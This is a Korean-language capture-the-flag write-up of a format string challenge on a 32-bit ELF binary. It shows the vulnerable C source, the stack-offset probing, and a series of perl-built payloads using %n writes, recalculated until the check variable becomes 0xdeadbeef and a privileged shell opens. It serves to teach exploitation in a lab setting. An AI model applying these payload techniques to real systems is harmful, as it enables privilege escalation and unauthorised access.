[App-System] ELF x86 - Format string bug basic 2

1. intro

2. code 및 분석

2.1.  code

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
 
int main( int argc, char ** argv )
 
{
 
        int var;
        int check  = 0x04030201;
 
        char fmt[128];
 
        if (argc <2)
                exit(0);
 
        memset( fmt, 0, sizeof(fmt) );
 
        printf( "check at 0x%x\n", &check );
        printf( "argv[1] = [%s]\n", argv[1] );
 
        snprintf( fmt, sizeof(fmt), argv[1] );
 
        if ((check != 0x04030201) && (check != 0xdeadbeef))    
                printf ("\nYou are on the right way !\n");
 
        printf( "fmt=[%s]\n", fmt );
        printf( "check=0x%x\n", check );
 
        if (check==0xdeadbeef)
        {
                printf("Yeah dude ! You win !\n");
                setreuid(geteuid(), geteuid());
                system("/bin/bash");
        }
}

2.2. 분석

전형적인 fsb 문제이다.

코드에서 argv[1] 값을 받아들이며

check 함수의 주소와 argv[1]의 값을 출력해주고

check 변수의 값을 확인한 다음

다시 한번 fmt 변수의 값과 check 변수의 값을 출력해준다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

snprintf 함수 사용 시 format string을 지정해주지 않아 format string bug가 발생한다.

 

3.2. 공격 준비

몇번째 %p에서 값이 출력되는지 확인해보자.

app-systeme-ch14@challenge02:~$ ./ch14 `perl -e 'print "AAAA","%p"x9'`
check at 0xbffffac8
argv[1] = [AAAA%p%p%p%p%p%p%p%p%p]
fmt=[AAAA0x80485f1(nil)(nil)0xc20xbffffc140xb7fe14490xf63d4e2e0x40302010x41414141]
check=0x4030201

9번째에서 발생하였다.

변경해야할 주소는 check 변수의 주소이며, 변경해야할 값은 0xdeadbeef이다.

fsb에서 변경할 값은 4,2,1byte로 삽입할 수 있는데, 1byte씩 끊어서 넣어보면 전체 페이로드는 대략 아래와 같아지며

테스트삼아 입력해보면 check 변수의 위치가 달라진 것을 확인할 수 있다.

app-systeme-ch14@challenge02:~$ ./ch14 `perl -e 'print "AAAA","BBBB","AAAA","BBBB","AAAA","BBBB","AAAA","BBBB","%p"x7,"%c","%n","%c","%n","%c","%n","%c","%n"'`
check at 0xbffffaa8
argv[1] = [AAAABBBBAAAABBBBAAAABBBBAAAABBBB%p%p%p%p%p%p%p%c%n%c%n%c%n%c%n]
Segmentation fault

이유는 snprintf에서 fmt 변수의 길이가 입력받는 값에 따라 변하기 때문에 check 변수의 위치도 달라진 것이다.

해당 위치로 다시 한번 페이로드를 변경해서 넣어보면 아래와 같다.

app-systeme-ch14@challenge02:~$ ./ch14 `perl -e 'print "\xa8\xfa\xff\xbf","BBBB","\xa9\xfa\xff\xbf","BBBB","\xaa\xfa\xff\xbf","BBBB","\xab\xfa\xff\xbf","BBBB","%p"x7,"%c","%n","%c","%n","%c","%n","%c","%n"'`
check at 0xbffffaa8
argv[1] = [▒▒▒▒BBBB▒▒▒▒BBBB▒▒▒▒BBBB▒▒▒▒BBBB%p%p%p%p%p%p%p%c%n%c%n%c%n%c%n]

You are on the right way !
fmt=[]
check=0x59585756

변경할 값을 계산하기 위해 deadbeef를 1byte씩 끊어 10진수로 표현해보면
de = 222
ad = 173
be = 190
ef = 239
가 된다.

제일 마지막 ef부터 입력해야할 값을 계산해보면

우선 페이로드 기준으로 입력된 값이 check=0x59585756으로 56 byte가 사용되었으므로

ef => 239 - 0x56 + 1 = 239 - 86 + 1 = 154
be => be - ef => 1be - ef = 446 - 239 = 207
ad => ad - be => 1ad - be = 429 - 190 = 239
de => de - ad = 222 - 173 = 49

가 된다.

다시 한번 페이로드를 변경해서 시도하면

./ch14 `perl -e 'print "\xa8\xfa\xff\xbf","BBBB","\xa9\xfa\xff\xbf","BBBB","\xaa\xfa\xff\xbf","BBBB","\xab\xfa\xff\xbf","BBBB","%p"x7,"%154c","%n","%207c","%n","%239c","%n","%49c","%n"'`

app-systeme-ch14@challenge02:~$ ./ch14 `perl -e 'print "\xa8\xfa\xff\xbf","BBBB","\xa9\xfa\xff\xbf","BBBB","\xaa\xfa\xff\xbf","BBBB","\xab\xfa\xff\xbf","BBBB","%p"x7,"%154c","%n","%207c","%n","%239c","%n","%49c","%n"'`
check at 0xbffffa98
argv[1] = [▒▒▒▒BBBB▒▒▒▒BBBB▒▒▒▒BBBB▒▒▒▒BBBB%p%p%p%p%p%p%p%154c%n%207c%n%239c%n%49c%n]
fmt=[▒▒▒▒BBBB▒▒▒▒▒▒]
check=0x4030201

마찬가지로 페이로드 길이가 변경되었기에 check 주소도 변경되었다.

이를 기준으로 다시 변경해서 시도.

 

4. exploit

app-systeme-ch14@challenge02:~$ ./ch14 `perl -e 'print "\x98\xfa\xff\xbf","BBBB","\x99\xfa\xff\xbf","BBBB","\x9a\xfa\xff\xbf","BBBB","\x9b\xfa\xff\xbf","BBBB","%p"x7,"%154c","%n","%207c","%n","%239c","%n","%49c","%n"'`
check at 0xbffffa98
argv[1] = [▒▒▒▒BBBB▒▒▒▒BBBB▒▒▒▒BBBB▒▒▒▒BBBB%p%p%p%p%p%p%p%154c%n%207c%n%239c%n%49c%n]
fmt=[]
check=0xdeadbeef
Yeah dude ! You win !
app-systeme-ch14-cracked@challenge02:~$ id
uid=1214(app-systeme-ch14-cracked) gid=1114(app-systeme-ch14) groups=1114(app-systeme-ch14),100(users)
app-systeme-ch14-cracked@challenge02:~$ cat .passwd
-------------- #플래그는 삭제